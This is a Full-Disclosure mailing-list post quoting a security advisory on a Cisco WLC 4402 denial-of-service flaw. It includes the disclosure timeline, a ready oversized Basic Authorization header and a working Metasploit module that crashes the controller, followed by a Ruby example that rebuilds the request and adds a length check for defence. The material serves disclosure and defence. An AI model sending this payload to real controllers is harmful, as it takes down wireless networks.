Message-Id: <20090726232724.12C53B0048@smtp.hushmail.com>
Date: Sun, 26 Jul 2009 18:27:24 -0500
From: antisecav@...hmail.com
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Cisco WLC 4402 Denial-of-Service vulnerability
that was a crappy disclosure.
where is the .exe file with the gui?
at least make it in visual basic so i can have an interface
just send it to me in a zip
then it'll be useful to the intelligence community
n3td3v / antisec
On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories --
Christoph Bott <advisories@...t.syss.de> wrote:
>=======================================
>Vulnerable Product: Cisco WLC 4402 (most likely among many others)
>Vulnerability discovered: January 2009
>Reported to vendor: Jan 01, 2009
>Fix available: not yet
>=======================================
>
>
>TIMELINE:
>---------------------------------------------------
>+ 01/11/2009: discovered vulnerability on a customer's site
>
>+ 01/13/2009: initial vendor contact via psirt@...co.com
>
>+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>
>+ 02/09/2009: vendor states that bugfix is _not_ contained within
>  cisco-sa-20090204-wlc
>
>+ 03/30/2009: vendor states: "We have a fix for this issue. However,
>  due to some other issues we are investigating we may not make this
>  public until about 42 days."
>
>+ 06/02/2009: vendor states: "I really apologize for the delay on
>  publishing this advisory. The reason that we have not publish is
>  because we are also incorporating other security fixes within all the
>  affected releases. We WILL be publishing the advisory on July 8th,
>  2009 at 1600 UTC."
>
>+ 07/24/2009: Customer agreed with full disclosure
>
>+ 07/26/2009: Still no fixes available; full disclosure due to lacking
>  vendor activities.
>
>
>
>PRODUCT:
>---------------------------------------------------
>The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via
>an integrated embedded webserver (emweb httpd).
>
>
>
>AFFECTED VERSIONS:
>---------------------------------------------------
>The vulnerability described below could have been verified on WLC 4402,
>software release 5.1.151.0. However, since the vulnerability affects the
>integrated embedded emweb http daemon, several other products and/or
>software releases might be affected, too.
>
>
>
>VULNERABILITY:
>---------------------------------------------------
>Using long, random authentication data, the embedded web server can be
>crashed, which leads to a device reboot. Subsequently repeated requests
>lead to a permanent denial of service of the WLC (and therefore of the
>whole wireless infrastructure).
>
>
>
>EXPLOIT:
>---------------------------------------------------
>Not needed.
>
>One only has to call "/screens/frameset.html" and provide Basic
>Authentication data which uses a username and password longer than 63
>characters each.
>
>The following header worked for me:
>Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
>
>
>The following code snippet can be used as a module within the metasploit
>framework:
>
>---- snip -----
>require 'msf/core'
>
>class Metasploit3 < Msf::Auxiliary
>
>  include Msf::Exploit::Remote::Tcp
>  include Msf::Auxiliary::Dos
>
>  def initialize(info = {})
>    super(update_info(info,
>      'Name'        => 'Cisco WLC 4200 Basic Auth Denial of Service',
>      'Description' => %q{
>        This module triggers a Denial of Service condition in the Cisco WLC 4200
>        HTTP server. By sending a GET request with long authentication data, the
>        device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
>      },
>      'Author'      => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
>      'License'     => MSF_LICENSE,
>      'Version'     => '$Revision: 5949 $',
>      'References'  =>
>        [
>          [ 'BID', '???'],
>          [ 'CVE', '???'],
>          [ 'URL', 'http://www.cisco.com/?????'],
>        ],
>      'DisclosureDate' => 'January 26 2009'))
>
>    register_options(
>      [
>        Opt::RPORT(80),
>      ], self.class)
>  end
>
>  def run
>    connect
>
>    print_status("Sending HTTP DoS packet")
>
>    # The credential decodes to a 64-character username and a 64-character
>    # password ("1234567890" repeated), i.e. longer than the 63 characters
>    # the advisory names as the trigger.
>    sploit =
>      "GET /screens/frameset.html HTTP/1.0\r\n" +
>      "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
>
>    # End the Authorization line and terminate the header block with the
>    # blank line HTTP requires.
>    sock.put(sploit + "\r\n\r\n")
>
>    disconnect
>  end
>
>end
>
>---- snip ----
>
>
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
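The oversized Basic credential the advisory describes, together with the server-side length check that would have refused it, as an added example in Ruby (the language of the module above). This is not code from the SySS advisory or its Metasploit module: the base64 value is the one the advisory printed, but the builder, the check, the constant MAX_CRED_LEN and every function name are this example's own, and the 63-character limit is taken from the advisory's stated trigger, not from any knowledge of the WLC's implementation.

```ruby
require 'base64'

# Added example (not from the SySS advisory or its Metasploit module): builds
# the oversized HTTP Basic credential the advisory describes, decodes the
# advisory's own header to show what it contains, and applies the length
# check a web server should run before handing the credential to its login
# routine. All names and the constant below are this example's assumptions.

# The Authorization value printed in the advisory, copied verbatim.
ADVISORY_B64 = 'MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0'

# Hypothetical limit: the advisory names "longer than 63 characters each" as
# the trigger, so anything above 63 is refused here.
MAX_CRED_LEN = 63

# Build "Authorization: Basic <base64(user:pass)>" with a username and
# password of the given lengths, filled with the digit pattern the advisory used.
def basic_auth_header(user_len, pass_len)
  digits = ('1'..'9').to_a.join + '0'            # "1234567890"
  user = (digits * (user_len / 10 + 1))[0, user_len]
  pass = (digits * (pass_len / 10 + 1))[0, pass_len]
  'Authorization: Basic ' + Base64.strict_encode64("#{user}:#{pass}")
end

# The HTTP/1.0 request the advisory's module sends, with the blank line that
# terminates the header block.
def dos_request(user_len = 64, pass_len = 64, path = '/screens/frameset.html')
  "GET #{path} HTTP/1.0\r\n" + basic_auth_header(user_len, pass_len) + "\r\n\r\n"
end

# Decode a Basic credential into [user, password]; nil if the value is not
# valid base64 or lacks the ':' separator.
def decode_basic(value)
  user, pass = Base64.strict_decode64(value).split(':', 2)
  pass.nil? ? nil : [user, pass]
rescue ArgumentError
  nil
end

# Server-side check (also usable as a detection rule over captured requests):
# returns :missing, :malformed, :oversized or :ok. Lengths are checked on the
# decoded bytes before anything else touches the credential.
def check_authorization(request, max_len = MAX_CRED_LEN)
  line = request.lines.find { |l| l =~ /\AAuthorization:\s*Basic\s+/i }
  return :missing if line.nil?
  creds = decode_basic(line.sub(/\AAuthorization:\s*Basic\s+/i, '').strip)
  return :malformed if creds.nil?
  user, pass = creds
  return :oversized if user.bytesize > max_len || pass.bytesize > max_len
  :ok
end

if __FILE__ == $0
  user, pass = decode_basic(ADVISORY_B64)
  puts "advisory header decodes to a #{user.length}-char user and #{pass.length}-char password"
  puts "64/64 request: #{check_authorization(dos_request)}"
  puts "63/63 request: #{check_authorization(dos_request(63, 63))}"
end
```

Running the script shows that the advisory's header is exactly a 64-character username and a 64-character password, so `basic_auth_header(64, 64)` reproduces it byte for byte, and that `check_authorization` classifies the 64/64 request as `:oversized` while a 63/63 request passes. The check decodes first and measures the decoded fields, because a limit applied to the base64 text alone would let a short username hide an oversized password.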